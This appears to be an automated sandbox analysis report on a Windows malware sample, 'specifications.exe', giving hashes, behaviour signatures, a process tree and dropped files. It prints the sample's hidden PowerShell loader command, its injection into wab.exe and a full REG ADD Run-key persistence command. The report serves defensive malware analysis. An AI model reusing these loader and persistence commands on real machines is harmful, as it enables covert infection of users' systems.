Analysis
-
max time kernel
146s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
13-06-2024 15:47
Static task
static1
Behavioral task
behavioral1
Sample
specifications.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
specifications.exe
Resource
win10v2004-20240611-en
General
-
Target
specifications.exe
-
Size
990KB
-
MD5
54e257b56a256a2f1b062d2cebda6b2d
-
SHA1
4c4d8ddc6afce07f623b256fb21638cbdbd16144
-
SHA256
4e984c829df56d7ec108cc19f3015e3c39ab0b0fdc9f11eaeeecb91d525db545
-
SHA512
6f8e30f1b11fee49461691fd1d74de2dfe1c6f64c369d59632cb9e862ba3c3d0abab329e3134f5adcc066ee26f00f96ce303e1f5cdc318969698a7ce99261fce
-
SSDEEP
24576:/4ezTAAfvu9z/4Jy7WjTfmzKnsWhegcKyJI:/4WAAfIgNjT+KnsWhegcXG
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dugens = "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\\Imbodying\\').Swails;%Spontan59% ($Taarepersede)" reg.exe -
Drops file in System32 directory 1 IoCs
Processes:
specifications.exedescription ioc process File opened for modification C:\Windows\SysWOW64\driftschefernes.ini specifications.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1896 powershell.exe 2544 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1896 set thread context of 2544 1896 powershell.exe wab.exe -
Drops file in Program Files directory 2 IoCs
Processes:
specifications.exedescription ioc process File created C:\Program Files (x86)\Common Files\twig\Monetising.lnk specifications.exe File opened for modification C:\Program Files (x86)\inspiredly.snu specifications.exe -
Drops file in Windows directory 1 IoCs
Processes:
specifications.exedescription ioc process File opened for modification C:\Windows\Fonts\undispersing\frelserens.ini specifications.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1896 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
specifications.exepowershell.exewab.execmd.exedescription pid process target process PID 2424 wrote to memory of 1896 2424 specifications.exe powershell.exe PID 2424 wrote to memory of 1896 2424 specifications.exe powershell.exe PID 2424 wrote to memory of 1896 2424 specifications.exe powershell.exe PID 2424 wrote to memory of 1896 2424 specifications.exe powershell.exe PID 1896 wrote to memory of 2740 1896 powershell.exe cmd.exe PID 1896 wrote to memory of 2740 1896 powershell.exe cmd.exe PID 1896 wrote to memory of 2740 1896 powershell.exe cmd.exe PID 1896 wrote to memory of 2740 1896 powershell.exe cmd.exe PID 1896 wrote to memory of 2544 1896 powershell.exe wab.exe PID 1896 wrote to memory of 2544 1896 powershell.exe wab.exe PID 1896 wrote to memory of 2544 1896 powershell.exe wab.exe PID 1896 wrote to memory of 2544 1896 powershell.exe wab.exe PID 1896 wrote to memory of 2544 1896 powershell.exe wab.exe PID 1896 wrote to memory of 2544 1896 powershell.exe wab.exe PID 2544 wrote to memory of 2632 2544 wab.exe cmd.exe PID 2544 wrote to memory of 2632 2544 wab.exe cmd.exe PID 2544 wrote to memory of 2632 2544 wab.exe cmd.exe PID 2544 wrote to memory of 2632 2544 wab.exe cmd.exe PID 2632 wrote to memory of 2520 2632 cmd.exe reg.exe PID 2632 wrote to memory of 2520 2632 cmd.exe reg.exe PID 2632 wrote to memory of 2520 2632 cmd.exe reg.exe PID 2632 wrote to memory of 2520 2632 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\specifications.exe"C:\Users\Admin\AppData\Local\Temp\specifications.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Nondenunciation=Get-Content 'C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Personalhistoriker\millionren.Non';$Tabinet=$Nondenunciation.SubString(50736,3);.$Tabinet($Nondenunciation)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2740
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dugens" /t REG_EXPAND_SZ /d "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\Imbodying\').Swails;%Spontan59% ($Taarepersede)"4⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dugens" /t REG_EXPAND_SZ /d "%Spontan59% -windowstyle minimized $Taarepersede=(Get-ItemProperty -Path 'HKCU:\Imbodying\').Swails;%Spontan59% ($Taarepersede)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2520
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Personalhistoriker\millionren.NonFilesize
49KB
MD580157482bbee05d39cc6eb150df00ee5
SHA1541958b59d496ae8814c09336eda330993db754c
SHA2564c2726ecd1f509ea66be91622735c2b9885c232c3b3733390e46d2859b2aed0b
SHA51282f62f244fe0690c68b4eb983e1bd5ae421a5f10cf12d281a9dc167d9b99f60ea4dcac573f05626e5fc41ae50d18754029eae3f677806a83dfd7a801bda61c16
-
C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Straalerne.NowFilesize
299KB
MD574633979df571bd25e1c1e87f24becf7
SHA1e2cb97f7015f6e49dde64f15f9c78607b32797e2
SHA256a6bc8292d47989709e989e8f32243c7b42ca38879ec19ffec6376a69e2d0cf4f
SHA5126dcae3ca303a709d3ad2e9c1ce90836ad84bdd49c5e0a78fc066c1e31493525a71f04b0a39e5593db953fe6f8c5e84b421a8c5a20814d01933c1bd41b1341f31
-
memory/1896-8-0x0000000073CE1000-0x0000000073CE2000-memory.dmpFilesize
4KB
-
memory/1896-9-0x0000000073CE0000-0x000000007428B000-memory.dmpFilesize
5.7MB
-
memory/1896-10-0x0000000073CE0000-0x000000007428B000-memory.dmpFilesize
5.7MB
-
memory/1896-11-0x0000000073CE0000-0x000000007428B000-memory.dmpFilesize
5.7MB
-
memory/1896-15-0x0000000006470000-0x000000000A3C7000-memory.dmpFilesize
63.3MB
-
memory/1896-16-0x0000000073CE0000-0x000000007428B000-memory.dmpFilesize
5.7MB
-
memory/2544-17-0x00000000002D0000-0x0000000001332000-memory.dmpFilesize
16.4MB